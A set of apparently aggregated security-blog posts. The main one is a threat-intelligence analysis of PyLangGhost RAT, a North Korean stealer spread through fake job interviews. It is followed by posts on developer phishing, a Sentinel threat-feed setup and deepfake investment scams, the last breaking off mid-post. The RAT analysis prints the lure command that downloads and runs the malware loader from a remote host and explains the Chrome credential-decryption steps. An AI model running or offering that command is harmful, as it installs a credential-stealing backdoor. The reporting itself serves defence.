Editor’s note: The current article is authored by Mauro Eldritch, offensive security expert and threat intelligence analyst. You can find Mauro on X. 

North Korean state-sponsored groups, such as Lazarus, continue to target the financial and cryptocurrency sectors with a variety of custom malware families. In previous research, we examined strains like InvisibleFerret, Beavertail, and OtterCookie, often deployed through fake developer job interviews or staged business calls with executives. While these have been the usual suspects, a newer Lazarus subgroup, Famous Chollima, has recently introduced a fresh threat: PyLangGhost RAT, a Python-based evolution of GoLangGhostRAT. 

Unlike common malware that spreads through pirated software or infected USB drives, PyLangGhost RAT is delivered via highly targeted social engineering campaigns aimed at the technology, finance, and crypto industries, with developers and executives as prime victims. In these attacks, adversaries stage fake job interviews and trick their targets into believing that their browser is blocking access to the camera or microphone. The “solution” they offer is to run a script that supposedly grants permission. In reality, the script hands over full remote access to a North Korean operator. 

This sample was obtained from fellow researcher Heiner García Pérez of BlockOSINT, who encountered it during a fake job recruitment attempt and documented his findings in an advisory.  

Let’s break it down. 

Key Takeaways 

• Attribution: PyLangGhost RAT is linked to the North Korean Lazarus subgroup Famous Chollima, known for using highly targeted and creative intrusion methods. 

• Delivery Method: Distributed through “ClickFix” social engineering, where victims are tricked into running malicious commands to supposedly fix a fake camera or microphone error during staged job interviews. 

• Core Components: The malware’s main loader (nvidia.py) relies on multiple modules (config.py, api.py, command.py, util.py, auto.py) for persistence, C2 communication, command execution, data compression, and credential theft. 

• Credential & Wallet Theft: Targets browser-stored credentials and cryptocurrency wallet data from extensions like MetaMask, BitKeep, Coinbase Wallet, and Phantom, using privilege escalation and Chrome encryption key decryption (including bypasses for Chrome v20+). 

• C2 Communication: Communicates over raw IP addresses with no TLS, using weak RC4/MD5 encryption, but remains stealthy with very low initial detection rates (0–3 detections on VirusTotal). 

• Detection & Analysis: Identified as 100/100 malicious by ANY.RUN, with telltale signs including the default python-requests User-Agent and multiple rapid requests to C2 infrastructure. 

• Code Origin: Appears to be a full Python reimplementation of GoLangGhost RAT, likely aided by AI, as indicated by Go-like logic patterns, unusual code structure, and large commented-out sections. 

The Fake Job Offer Trap 

In the past, DPRK operators have resorted to creative methods to distribute malware, from staging fake job interviews and sharing bogus coding challenges (some laced with malware, others seemingly clean but invoking malicious dependencies at runtime), to posing as VCs in business calls, pretending not to hear the victim, and prompting them to download a fake Zoom fix or update. 

This case is a bit different. It falls into a newer category of attacks called “ClickFix” — scenarios where the attacker, or one of their websites, presents the victim with fake CAPTCHAs or error messages that prevent them from completing an interview or coding challenge. The proposed fix is deceptively simple: copy a command shown on the website and paste it into a terminal or the Windows Run window (Win + R) to “solve the issue.” By doing so, users end up executing malicious scripts with their own privileges, or even worse, as Administrator, essentially handing control of the system to a Chollima operator. 

In this case, the researcher received a fake job offer to work at the Aave DeFi Protocol. After a brief screening with a few generic questions, he was redirected to a page that began flooding him with notifications about an error dubbed “Race Condition in Windows Camera Discovery Cache.” 

Luckily, the website offered a quick fix for this “problem”: just run a small code snippet in the terminal. 

But what does this code actually do? Let’s find out. 

Chollimas & Pythons 

Let’s analyze the command: 

curl -k -o “%TEMP%nvidiaRelease.zip” https://360scanner.store/cam-v-b74si.fix && powershell -Command “Expand-Archive -Force -Path ‘%TEMP%nvidiaRelease.zip’ 

-DestinationPath ‘%TEMP%nvidiaRelease’” && wscript “%TEMP% 

nvidiaReleaseupdate.vbs” 

This line: 

• Downloads a ZIP file from 360scanner[.]store using curl. 

• Extracts it to the %TEMP%nvidiaRelease directory using PowerShell’s Expand- Archive. 

• Executes a VBScript named update.vbs via wscript. 

Now let’s look at what this script actually does:

Inside update.vbs 

It silently decompresses Lib.zip to the same directory, using tar, and waits for the extraction to finish, hiding any windows during the process. 

Then, it runs csshost.exe nvidia.py. The filename csshost.exe is mildly obfuscated by being split in two parts (“css” & “host.exe”) before execution. 

Disguised Python Environment 

But what is csshost.exe? 

It’s actually a renamed python.exe binary. Nothing more. No packing, no exotic tricks; just Python, rebranded. 

The Lib.zip file is a clean Python environment bundled with standard libraries, containing nothing malicious or unusual. 

A Decoy and Its Real Payload 

Funny enough, if you try to download the same file manually with a different User- Agent, the server returns a legitimate driver instead — a clever decoy tactic. 

On the other hand, nvidia.py imports three additional components: api.py, config.py, and command.py. The last one, in turn, also uses util.py and auto.py.  

Core Modules and Their Roles 

Let’s break down the 3 modules, starting with config.py. 

This file defines a set of constants used throughout the malware lifecycle, including message types, command codes, and operational parameters. 

Here’s a quick reference of the command dictionary defined in config.py: 

Immediately after that, a C2 server based in the United Kingdom is declared (some sources indicate “Private Client – Iran”), along with a registry key used for persistence, and a list of Chrome extensions targeted for exfiltration, including MetaMask, BitKeep, Coinbase Wallet, and Phantom. 

Coming up next, api.py manages communication with the C2 server we just saw on config.py. There are three main functions: 

1. Packet0623make, which resorts to RC4 cipher to encrypt data in transmission, builds a packet and computes a checksum. RC4 is obsolete and weak but simple, which may explain why that choice. 

2. Packet0623decode, which validates the checksum and decrypts the packet. 

3. Htxp0623Exchange, which simply posts the packet to the server without TLS encryption, thus making the RC4 and MD5 cocktail an even weaker choice. 

Now command.py acts as a dispatcher, interpreting both malware logic and C2 communications, and executing instructions accordingly. It also handles status messages defined in the config.py module we examined earlier. 

The key functions are: 

You probably remember that command.py imports two other custom modules: util.py and auto.py. Let’s review them as well. 

Module util.py implements three functions: 

Finally, the last and most critical module: auto.py. 

This module implements two key functions: 

• AutoGatherMode: Collects configuration data from cryptocurrency browser extensions such as MetaMask, BitKeep, Coinbase Wallet, and Phantom. 

• AutoCookieMode: Extracts login artifacts, including credentials and cookies, from Google Chrome. 

The autoGatherMode function searches for the user’s Google Chrome profile directory (AppDataLocalGoogleChromeUser Data), starting with the Default profile and then enumerating others. It compresses the configuration directories of the targeted extensions into a single archive named gather.tar.gz and exfiltrates it for manual analysis, with the goal of enabling account takeover or compromising cryptocurrency wallets. 

With the rise of information-stealing malware, browser vendors have introduced various countermeasures to protect sensitive data such as password managers, cookies, and encrypted storage vaults. Chrome is no exception. To bypass these protections, the malware includes functions designed to check whether the user has administrative privileges and to retrieve Chrome’s encryption key through different methods, depending on the browser version, as the protection mechanisms vary. 

The autoCookieMode function, on the other hand, starts by checking if the user has administrative privileges. If not, it relaunches itself using runas, triggering a UAC (User Access Control) prompt. The prompt is intentionally deceptive, it simply displays “python.exe” as the requesting binary, providing no additional context or visual indicators. This subtle form of social engineering increases the likelihood of the user granting permission. 

If the prompt is accepted, the malware gains elevated privileges, which are necessary to interact with privileged APIs such as the Data Protection API (DPAPI) used to retrieve Chrome’s encryption keys. If the user declines, the malware continues execution with the current user’s privileges. 

It then creates a file named chrome_logins_dump.txt to store the extracted credentials. To do so, it accesses Chrome’s Local State file, which contains either an encrypted_key (in v10) or an app_bound_encrypted_key (in v20+). These keys are not stored in plaintext but encoded in Base64 and encrypted using Windows DPAPI. While they are accessible to the current user, they require decryption before use. 

In Chrome v10, the encryption key is protected solely by the user’s DPAPI context and can be decrypted directly. In Chrome v20 and later, the key is app-bound and encrypted twice — first with the machine’s DPAPI context, and then again with the user’s. To bypass this layered protection, the malware impersonates the lsass.exe process to temporarily gain SYSTEM privileges. 

It then applies both layers of decryption, yielding a key blob which, once parsed, reveals the AES master key used to decrypt Chrome’s stored credentials. 

Once the key is obtained by either method, the malware connects to the Login Data SQLite database and extracts all stored credentials, applying the corresponding decryption logic for v10 or v20 entries depending on the case. 

At this point, it’s game over for the victim. 

With the module functionality now understood, the next step is to examine the malware’s core component: nvidia.py. Before diving in, here’s a summary of the auxiliary functions contained in this module. 

• check_adminRole: Checks if the current process has administrative privileges using IsUserAnAdmin(). 

• GetSecretKey: Extracts and decrypts the AES key used by Chrome (v10) from the Local State file using DPAPI. 

• DecryPayload: Decrypts a payload using a given cipher. 

• GenCipher: Constructs an AES-GCM cipher object using a given key and IV. 

• DecryPwd: Decrypts v10-style Chrome passwords using AES-GCM and the secret key obtained via DPAPI. 

• impersonate_lsass: Context manager that impersonates the lsass.exe process to gain SYSTEM privileges. 

• parse_key_blob: Parses Chrome’s v20 encrypted key blob structure to extract the IV, ciphertext, tag, and (if present) encrypted AES key. 

• decrypt_with_cng: Decrypts data using the Windows CNG API and a hardcoded key name (“Google Chromekey1”). 

• byte_xor: Performs XOR between two byte arrays (used to unmask AES key in v20 key blobs). 

• derive_v20_master_key: Decrypts and derives the AES master key from parsed v20 Chrome blobs, supporting multiple encryption flags (AES, ChaCha20, masked AES). 

From Recon to Full Control 

Now, to the core component: nvidia.py. 

This module begins by registering a registry key to establish persistence, assigning a unique identifier (UUID) to the host, and creating a pseudo–mutex-like mechanism via a .store file to prevent multiple instances from running simultaneously. It then enters a loop, continuously listening for new instructions from the C2 server. Additionally, it supports standalone execution with specific command-line arguments, enabling it to immediately perform actions such as stealing cookies or login data. 

Analysis in ANY.RUN shows that all communication with the C2 servers is carried out over raw IP addresses, with no domain names used. While the traffic is not encrypted with TLS, it is at least obfuscated using RC4; a weak method, but still an added layer of concealment. 

View real case inside ANY.RUN sandbox 

The sandbox quickly flags the traffic as suspicious. Because the malware uses the default python-requests User-Agent and sends multiple rapid requests, this pattern becomes a reliable detection indicator. 

Another key observation: most of the malware artifacts used in this campaign register only 0 to 3 detections on VirusTotal, making them particularly stealthy. Fortunately, ANY.RUN immediately identifies these samples as 100/100 malicious, starting with the initial update.vbs loader. 

Other components, including nvidia.py, the main launcher, are also flagged instantly with a 100/100 score, providing early warning against this evolving threat. 

New malware, you say? Let’s take a closer look. 

Gophers, Ghosts & AI 

A variant of this sample was recently observed by other security laboratories, which noted strong similarities to GoLangGhost RAT. In fact, this appears to be a full reimplementation of that RAT in Python, but with a notable twist. 

Analysis revealed numerous linguistic patterns and unusual coding constructions, including dead code, large commented-out sections, and Go-style logic structures, suggesting that the port from Go to Python was at least partially assisted by AI tools. 

Ghosts, Gophers, Pythons, and AI, all converging in a single malware family.  

Let’s go to the ATT&CK Matrix now, which ANY RUN does automatically. 

PylangGhost RAT ATT&CK Details 

PylangGhost RAT shares several tactics, techniques, and procedures (TTPs) with its related families, OtterCookie, InvisibleFerret, and BeaverTail but also introduces some new ones: 

Business Impact of PyLangGhost RAT 

PyLangGhost RAT poses a significant risk to organizations in the technology, finance, and cryptocurrency sectors, with potential consequences including: 

• Financial losses: Compromised cryptocurrency wallets and stolen credentials can lead directly to asset theft and fraudulent transactions. 

• Data breaches: Exfiltration of sensitive corporate data, browser-stored credentials, and internal documents can expose intellectual property, customer information, and strategic plans. 

• Operational disruption: Persistent remote access allows attackers to move laterally, deploy additional payloads, and disrupt business-critical systems. 

• Reputational damage: Public disclosure of a breach tied to a high-profile state-sponsored group can undermine client trust and brand credibility. 

• Regulatory consequences: Data theft incidents may trigger compliance violations (e.g., GDPR, CCPA, financial regulations) resulting in legal penalties and reporting obligations. 

Given its low detection rate and targeted social engineering approach, PyLangGhost RAT enables attackers to operate inside a network for extended periods before discovery, increasing both the scope and cost of an incident. 

How to Fight Against PyLangGhost RAT 

Defending against PyLangGhost RAT requires a combination of proactive detection, security awareness, and layered defenses: 

• Use behavior-based analysis: Solutions like ANY.RUN’s Interactive Sandbox can detect PyLangGhost RAT in minutes by exposing its execution chain, raw IP C2 connections, and credential theft activity. 

• Validate unexpected commands: Educate employees to never run commands or scripts provided during job interviews or online “technical tests” without verification from security teams. 

• Restrict administrative privileges: Limit the ability for standard users to run processes with elevated rights, reducing the malware’s ability to retrieve encrypted browser keys. 

• Monitor for anomalous network traffic: Look for unusual outbound connections to raw IPs or rapid repeated HTTP requests from unexpected processes. 

• Harden browser data security: Apply policies to clear cookies and credentials regularly, disable unneeded browser extensions, and enforce hardware-backed encryption where available. 

• Incident response readiness: Maintain a process for rapid sandbox testing of suspicious files or scripts to shorten investigation times and reduce business impact. 

Spot Similar Threats Early, Minimizing Business Risk 

When facing dangerous malware like PyLangGhost RAT, speed of detection is important. Every minute an attacker remains undetected increases the chances of stolen data, financial loss, and operational disruption. 

ANY.RUN’s Interactive Sandbox helps organizations identify and analyze threats like PyLangGhost RAT within minutes, combining real-time execution tracking with behavior-based detection to uncover even low-detection or newly emerging malware. 

• Rapid incident response: Detect threats early to stop lateral movement, data exfiltration, and further compromise. 

• Lower investigation costs: Automated analysis delivers verdicts quickly, reducing the time and resources needed for manual investigation. 

• Faster, smarter decisions: Clear visualized execution flows help security teams assess impact and choose the right containment measures. 

• Increased SOC efficiency: Streamlines detection, analysis, and reporting in one workflow, eliminating unnecessary manual steps. 

• Proactive threat hunting: Flags stealthy or low-signature artifacts, enabling defenders to identify and block similar threats before they spread. 

Early detection for business means lower risk, reduced costs, and stronger resilience against advanced cyberattacks. 

Try ANY.RUN to see how it can strengthen your proactive defense 

Gathered IOCs 

Domain: 360scanner[.]store

IPv4: 13[.]107.246[.]45

IPv4: 151[.]243.101[.]229 

URL: https[:]//360scanner[.]store/cam-v-b74si.fix

URL: http[:]//151[.]243[.]101[.]229[:]8080/ 

SHA256 (auto.py.bin) = bb794019f8a63966e4a16063dc785fafe8a5f7c7553bcd3da661c7054c6674c7 

SHA256 (command.py.bin) = c4fd45bb8c33a5b0fa5189306eb65fa3db53a53c1092078ec62f3fc19bc05dcb 

SHA256 (config.py.bin) = c7ecf8be40c1e9a9a8c3d148eb2ae2c0c64119ab46f51f603a00b812a7be3b45 

SHA256 (nvidia.py.bin) = a179caf1b7d293f7c14021b80deecd2b42bbd409e052da767e0d383f71625940 

SHA256 (util.py.bin) = ef04a839f60911a5df2408aebd6d9af432229d95b4814132ee589f178005c72f 

FileName: chrome_logins_dump.txt FileName: gather.tar.gz Mutex:.store 

Further Reading 

https://otx.alienvault.com/pulse/688186afb933279c4be00337

https://app.any.run/tasks/275e3573-0b3e-4e77-afaf-fe99b935c510 

https://www.virustotal.com/gui/file/a179caf1b7d293f7c14021b80deecd2b42bbd409e052da767e0d383f71625940/detection 

https://www.virustotal.com/gui/file/c7ecf8be40c1e9a9a8c3d148eb2ae2c0c64119ab46f51f603a00b812a7be3b45?nocache=1

https://www.virustotal.com/gui/file/c4fd45bb8c33a5b0fa5189306eb65fa3db53a53c1092078ec62f3fc19bc05dcb/community

The post PyLangGhost RAT: Rising Data Stealer from Lazarus Group Targeting Finance and Technology  appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

Just recently, within days of each other, Mozilla (the organization behind the Firefox browser) and the team that maintains the Python Package Index (a catalog of software written in Python) published very similar warnings about phishing attacks. Unknown attackers are trying to lure both Python developers with accounts on pypi.org and Firefox plugin creators with addons.mozilla.org accounts to fake sites in order to trick them into giving up their credentials. In this regard, we recommend that opensource developers (not just PyPi and AMO users) be especially careful when clicking on links from emails.

These two attacks are not necessarily related (after all, the phishers’ methods are slightly different). However, taken together, they demonstrate an increased cybercriminal interest in code repositories and app stores. Most likely, their ultimate goal is to organize supply chain attacks, or resell credentials to other criminals who can organize such an attack. After all, having gained access to a developer’s account, attackers can inject malicious code into packages or plugins.

Details of a phishing attack on PyPi developers

Phishing emails addressed to users of the Python Package Index are sent to addresses specified in the metadata of packages published on the site. The subject line contains the phrase “[PyPI] Email verification”. The emails are sent from addresses on the @pypj.org domain, which differs by only one letter from the real directory domain — @pypi.org — that is, they use a lowercase j instead of a lowercase i.

The email states that developers need to verify their email address by clicking on a link to a site that imitates the design of the legitimate PyPi. Interestingly, the phishing site not only collects the victims’ credentials, but also transmits them to the real site, so that after the “verification” is complete, the victim ends up on a legitimate site logged in, and often doesn’t even realize that their credentials have just been stolen.

The team that maintains the Python Package Index recommends that anyone who clicks on the link in the email immediately change their password, and also check the “Security History” section in their account.

Details of a phishing attack on addons.mozilla.org accounts

The phishing sent to Firefox add-on developers imitates emails from Mozilla or directly from AMO. The gist of the message boils down to a need to update account data in order to continue using the developer features.

Judging by the example uploaded by one of the recipients of the email, the attackers don’t bother to disguise the sender’s address — the letter was sent from a standard Gmail account. It also follows from the comments that sometimes phishers misspell the name Mozilla, missing one of the l letters.

How to stay safe?

Developers should be extremely careful with emails containing links to such sites. They should check the domains from which the emails are sent, as well as the links that they’re asked to follow. Even if the email seems legitimate, they should log in to the account on the site reached by manually entering the address, or by following a previously saved bookmark. In addition, we recommend equipping all devices used for work with security solutions that will block the opening of a phishing site even if the link was clicked on.

For companies that employ open source software developers, we recommend using an anti-phishing solution at the mail gateway level. In addition, it’s a good idea to periodically train employees to recognize modern phishers’ tricks. After all, even experienced IT specialists can fall for phishing. This can be done using our online Kaspersky Automated Security Awareness Platform.

Kaspersky official blog – ​Read More

ANY.RUN now delivers Threat Intelligence (TI) Feeds directly to Microsoft Sentinel via the built-in STIX/TAXII connector. No complicated setups. No custom scripts. Only high-quality indicators of compromise (IOCs) to fortify your SOC and catch attacks early, keeping your business secure. 

About the TI Feeds Connector for Microsoft Sentinel  

ANY.RUN’s TI Feeds support a seamless, out-of-the-box connection to Microsoft Sentinel that delivers real-time threat intelligence directly into your workspace. 

• Effortless Setup: Connect TI Feeds to Sentinel using the STIX/TAXII connector with your custom API key. 

• Enhanced Automation: Sentinel’s playbooks, powered by Azure Logic Apps, automatically correlate IOCs with your logs, triggering alerts or actions like blocking IPs. This cuts manual work and speeds up response times. 

• Cost Efficiency: Leverage your existing Sentinel setup without extra infrastructure costs. Fewer missed threats, thanks to high-fidelity IOCs, reduce the financial impact of breaches. 

The IOCs enriched with links to sandbox sessions can be used in Sentinel’s analytics, letting you build custom rules, visualize threats, and prioritize incidents effectively. 

What Makes ANY.RUN’s Threat Intelligence Feeds Unique 

ANY.RUN’s TI Feeds deliver malicious IPs, domains, URLs that have been active for just hours, not days. We extract them from live sandbox analyses of the latest threats hitting 15,000+ organizations worldwide. Unlike post-incident reports that lag behind, our feeds update every two hours, sending active attack indicators straight to clients. This lets MSSPs and SOCs detect today’s threats early and effectively, keeping systems secure. 

• Fresh Data: IOCs update every 2 hours from live attack detonations in ANY.RUN’s Interactive Sandbox. 

• Rich Context: Each IOC links to sandbox sessions with full TTPs for deeper investigations. 

• Low Noise: Pre-processing by expert analysts ensure near-zero false positives, saving your team time. 

• Flexible Integration: Thanks to API, SDK, STIX/TAXII support, TI Feeds work seamlessly with SIEM/XDR/firewalls and other solutions. 

How TI Feeds Help SOCs and MSSPs Spot Attacks in Time 

Threats move fast. Malware and phishing can slip through if you’re not ready. ANY.RUN TI Feeds give SOCs and MSSPs the edge to detect and stop attacks before they impact. Our high-fidelity IOCs — IPs, domains, URLs — come enriched with context from ANY.RUN’s Interactive Sandbox, ensuring you act with precision. 

• Catch Threats Early: Real-time IOCs enable preventive actions and rapid response to minimize damage. 

• Boost Detection Rate: Near-zero false positives and pre-processing help ensure that your SOC never misses a threat. 

• Lower Costs and Risks: Fewer undetected threats mean reduced financial and operational fallout. Fresh, reliable IOCs help you avoid costly breaches. 

• Cut MTTR: Faster alert triage and a complete threat visibility thanks to linked sandbox analyses informs responders’ actions, helping them prevent threat spread and reduce damage. 

• Improve SOC Performance: Automate threat processing, cutting manual tasks for SOC specialists and letting them prioritize top risks. 

Receive Threat Intelligence Feeds in Microsoft Sentinel 

Here is a detailed manual to guide your TI Feeds setup in Microsoft Sentinel. Should you need any assistance or have any questions, feel free to contact us. 

Connecting to the STIX/TAXII server 

1. Open MS Sentinel and go to the Data connectors tab in the Configuration section. 

2. Search for the Threat Intelligence STIX/TAXII connector and click Open connector page. 

3. You will see the list of prerequisites for the connector to work. If you lack any of them, view this documentation by Microsoft.  

4. Fill out the Configuration form: 

• Name the server via the Friendly name field 

• Insert API root URL: 

https://api.any.run/v1/feeds/taxii2

• Choose a Collection ID: 

• Enter your Username and Password. 

If you don’t have these credentials, contact your account manager at ANY.RUN or fill out this form.  

You can also choose to import all available indicators or those that are one day, week, or month old via the field Import indicators. Another optional setting is Polling frequency that determines how often you’d like to connect to the STIX/TAXII server to retrieve new feeds: once a minute, once an hour, or once a day. 

Finally, click Add, and you’re all set up. 

If you need more information, see STIX/TAXII documentation by ANY.RUN. 

Browsing indicators 

To access the indicators you’ve retrieved, go to the Threat intelligence tab. 

You’ll find a table with fields describing each indicator: 

• Values – indicator itself; 

• Names – name of an indicator; 

• Types – type of an indicator (IP, URL, or Domain); 

• Sources – source of an indicator; 

• Confidence – this rate determines our level of certainty on whether an indicator is malicious (50 – suspicious, 75 – likely malicious, 100 – malicious); 

• Alerts – number of alerts related to an indicator; 

• Tags – descriptors of an indicator; 

• Valid from and Valid until – time period during which an indicator is considered valid. 

Real-World Application Scenario

Here’s a typical flow your security operations can adopt: 

1. Feed Setup: Your security team configures IOC ingestion from ANY.RUN into Microsoft Sentinel, where data is indexed and becomes searchable. 

2. Automated Correlation: Sentinel continuously analyzes incoming logs from EDR systems, network equipment, proxies, email security, and other sources, automatically correlating them with ANY.RUN’s IOCs. 

3. Alert Generation: When matches are detected (IP addresses, domains, file hashes), Sentinel creates security events and alerts. 

4. Streamlined Triage: Alerts are routed to analysts for manual or semi-automated incident analysis, including log review, event correlation, and behavioral analysis. 

5. Rapid Response: Depending on your configuration, the system can execute manual or automated responses including isolation, blocking, or escalation procedures. 

How TI Feeds in MS Sentinel Boost SOC & MSSP Performance 

Plug ANY.RUN’s feeds into Microsoft Sentinel with minimal setup, leveraging existing infrastructure, and benefit from: 

• Faster Threat Detection: Fresh IOCs flow into your system quickly, accelerating identification of threats. 

• Seamless Interoperability: No need to overhaul processes or tools — TI feeds work within your Sentinel environment. 

• Enhanced Monitoring and Triage Capabilities: Expand your threat detection coverage with high-confidence indicators that improve both monitoring effectiveness and incident triage accuracy. 

• Access to Unique Data: Gain insights from real-time analysis of attacks on 15,000 organizations, powered by ANY.RUN’s Interactive Sandbox. 

• Cost Efficiency: Reduce setup costs by using a seamless STIX/TAXII connector. 

• Process Continuity: Maintain existing workflows without disruption. 

• Automation and Reduced Workload: Automate actions based on IOCs (e.g., flagging logs, isolating endpoints), freeing up SOC resources. 

• Competitive Edge for MSSPs: Stand out with exclusive IOCs derived from cutting-edge research, enhancing your service offerings. 

About ANY.RUN 

ANY.RUN is trusted by more than 500,000 cybersecurity professionals and 15,000+ organizations across finance, healthcare, manufacturing, and other critical industries. Our platform helps security teams investigate threats faster and with more clarity.  

Speed up incident response with our Interactive Sandbox: analyze suspicious files in real time, observe behavior as it unfolds, and make faster, more informed decisions.  

Strengthen detection with Threat Intelligence Lookup and TI Feeds: give your team the context they need to stay ahead of today’s most advanced threats.  

Want to see it in action? Start your 14-day trial of ANY.RUN today → 

The post ANY.RUN & Microsoft Sentinel: Catch Emerging Threats with Real-Time Threat Intelligence appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

X (formerly Twitter) has long had a solid reputation as a primary source of crypto scams, which are often promoted on the social network by compromised or fake accounts of celebrities or major companies. Meanwhile, Meta’s ubiquitous platforms — Instagram, Facebook, and WhatsApp — are earning a similar reputation in a different category: investment fraud involving deepfakes.

Criminals are eagerly exploiting AI tools to create fake videos of prominent figures in the financial sector — from famous economists and TV hosts to heads of government. Attackers then promote these videos by placing ads on social media. In this post, we explain how these schemes work, how victims are duped after watching these videos, the role WhatsApp plays in the schemes, and how you can avoid falling for them.

Instagram, deepfakes, and WhatsApp: investment scams in Canada

To understand how these scams work, we’ll start with a recent campaign that targeted customers of Canadian banks. Attackers began by running Instagram ads in the name of BMO Belski.

The abbreviation BMO was a deliberate choice; Canadian users consistently associate it with the country’s oldest bank, the Bank of Montreal. The mention of the Belski surname was no accident either: Brian Belski is BMO’s chief investment strategist and head of the bank’s investment strategy team.

The BMO Belski ads showed AI-generated deepfake videos of Belski himself promising users the chance to join a private investment group on WhatsApp. The criminals’ strategy was to dupe unsuspecting Canadian users into believing they’re getting trustworthy financial and investment advice from a recognized expert. The users would then rush to chat with the scammers through WhatsApp.

A curious detail: the BMO Belski account that ran these ads on Instagram had no profile on that social media platform at all. The ads ran through BMO Belski’s Facebook page. Meta, the company that owns both social networks, lets advertisers run Instagram ads from a Facebook business page, thus eliminating the need to create a separate Instagram account.

It’s also interesting that the Facebook page used to promote the fraudulent ads had existed since October 27, 2023, and was previously titled “Brentlinger Matt Blumm” — whatever or whoever that may be. The scammers likely used a pre-made or previously stolen account that was “marinated” for a few years to avoid suspicion and bypass moderation.

Researchers don’t know exactly what went on in the WhatsApp private investment chats promoted by the deepfake. There’s also no information about victims of the ad featuring the fake banker, or the amount of their losses. However, other cases involving similar schemes, which we discuss later in this post, give us an idea of how this could’ve looked.

Scammers impersonate Financial Times’ chief economics commentator

Several months ago in the UK, scammers employed a similar scheme, which featured a deepfake of Martin Wolf, the chief economics commentator for the Financial Times. Similarly to the Canadian bank scam, the fraudsters disseminated ads on Instagram that showed a fake Martin Wolf inviting people to join his WhatsApp group for investment advice.

A former colleague of Wolf’s first alerted the journalist to the ad in March 2025. Once alerted, Wolf started pushing Meta to block the ads because they violated several of the platform’s own advertising policies. After some back-and-forth with Meta, the journalist managed to get one of the fraudulent ads taken down. However, Wolf soon began receiving links to other similar videos.

A subsequent investigation by the journalist’s colleagues at the Financial Times showed that the scam campaign included at least three different deepfake videos and several digitally manipulated images of Martin Wolf. These materials appeared in more than 1700 ads across Facebook and Instagram.

According to data from the Meta Ad Library, these ads reached more than 970 000 users in EU countries alone (excluding the UK), where legislation requires platforms to disclose such information. At least ten accounts ran the campaign, with new profiles joining the game as soon as the previous ones were blocked.

The most shocking part? All of this occurred even though Martin Wolf was enrolled in Meta’s new face recognition system, which is specifically designed to automatically detect and remove this kind of content. The journalist himself questions why an organization as large as Meta, with plenty of resources and AI-powered tools, is unable to detect and block such schemes — if not fully automatically, then at least after direct notifications. Is it really that difficult?

What goes on inside WhatsApp scam chats: a British victim’s story

A British office manager named Sarah shared what happens inside “exclusive communities” on WhatsApp after she became a victim of scammers. She joined a WhatsApp group after watching an Instagram ad that featured Peter Hargreaves, the co-founder of the UK’s largest investment platform, Hargreaves Lansdown. You guessed it: the video was also a deepfake.

After Sarah gave the scammers her number, they contacted her and sent her an invitation to the WhatsApp group. Following that, they sent a link to download a supposed investment app to her smartphone. Sarah was told a “mentor” would assist her by telling her when and at what price to buy and sell assets to lock in a profit.

Initially, Sarah invested £50, but she soon began putting more and more of her savings into assets recommended in the WhatsApp group. Sarah believed she was investing in small, growing companies and quickly earning a profit. In just two weeks, her account showed about £300 in profits on a total investment of about £2 000.

Problems only began several weeks later when Sarah wanted to transfer the profit to her bank account. She started receiving requests to pay taxes, withdrawal fees, and regulatory fees. She continued to pay, convinced that she’d soon get her money back with a large profit.

When Sarah suspected a scam, it was already too late: all the money was gone. The WhatsApp group disappeared, her “mentor” stopped responding, and the investment app quit working. Along with the app, the £4000 she had invested and all of her supposed profits vanished.

More than 600 advertisements featuring deepfakes of Peter Hargreaves were found on the Meta platform. One of these ads led Sarah into the hands of scammers. Twenty-two fraudulent accounts placed the ads, and Hargreaves Lansdown had them removed in May of this year after filing a trademark infringement complaint.

To lure victims, the scammers also deployed deepfakes of other British financial celebrities besides Peter Hargreaves and Martin Wolf. These included Anthony Bolton, a former Fidelity International fund manager, and Stephanie Flanders, a former JP Morgan Asset Management economist.

From The Wolf of Wall Street to WhatsApp groups: how deepfake pump-and-dump schemes work

Malicious actors also employ deepfake videos in Facebook and Instagram ads to carry out another type of investment scam known as pump and dump. This scheme involves genuine financial assets — not fictional tokens in a fake application. The catch is that criminals buy up cheap, unattractive stocks to inflate their price. They then launch an aggressive advertising campaign on social media urging users to invest and promising rapid returns.

Due to the heightened interest, the stock price continues to rise for a time, and more people invest with hopes of easy profit. Once the value peaks, the scammers quickly sell off their shares and disappear with the earnings. After that, the price plummets, and everyone else is left with almost worthless stock.

A similar scheme existed long before the widespread adoption of deepfakes. One of the most famous examples of its execution was the work of Jordan Belfort, the inspiration for the main character in the movie The Wolf of Wall Street. In the early 1990s, his brokerage firm sold cheap, little-known stocks to clients, artificially inflating demand for them before dumping them at an inflated price.

Whereas stock market scammers in the past relied on their own asserted authority to convince victims to purchase dubious stocks, deepfake technology now allows them to exploit the reputations of experts and well-known figures.

For example, a scheme was recently uncovered in Israel where bad actors artificially inflated the stock price of Ostin Technology Group Co. Ltd. (OST). To do this, they circulated deepfake videos featuring business journalist Guy Rolnik, entrepreneur Eyal Waldman, and businesswoman Shari Arison. The scammers also impersonated reputable financial institutions, including the Tel Aviv Stock Exchange, the Israel Securities Authority, Bank Hapoalim, and Israel Discount Bank.

The fraudsters distributed fake promotional videos on Facebook and Instagram and, as in the previous scheme, invited users to join WhatsApp groups, where they provided them with advice on how to purchase OST stock. It didn’t take much persuading; a quick Google search confirmed that OST stock was, in fact, on the rise.

Over several weeks, the company’s stock rose multiple times, reaching US$9.02 at its peak, after which it collapsed by 93%, with the stock price falling to 13 cents. In the two most serious cases, two victims lost 250 000 and 150 000 shekels (about US$75 000 and US$45 000), respectively.

Meta can’t protect users from deepfakes: a story from Australia

Scam ads that targeted Australian Facebook and Instagram audiences employed deepfake videos of several well-known personalities to promote fraudulent investment schemes. These videos featured TV host and financial journalist David Koch, billionaire Gina Rinehart, conservationist and TV host Robert Irwin, and even Australia’s current prime minister, Anthony Albanese.

In a deepfake video, Anthony Albanese enthusiastically advertised an investment program that promised significant returns for minimal outlay. The links within the deepfake videos of him and the other personalities directed viewers to a fake news story. The article included what appeared to be quotes from famous Australian public figures to support investments in cryptocurrencies, or other get-rich-quick schemes. Facebook users were asked to sign up for the program, after which scammers would contact them to convince them to deposit money.

In response to user complaints about fraudulent ads, Facebook sent out the following boilerplate message:

“We didn’t remove the ad. Thanks again for your report. This information helps us improve the integrity and relevance of advertising on Facebook. […]

We understand this might be frustrating, so we recommend influencing the ads you see by hiding ads and changing your ad preferences”.

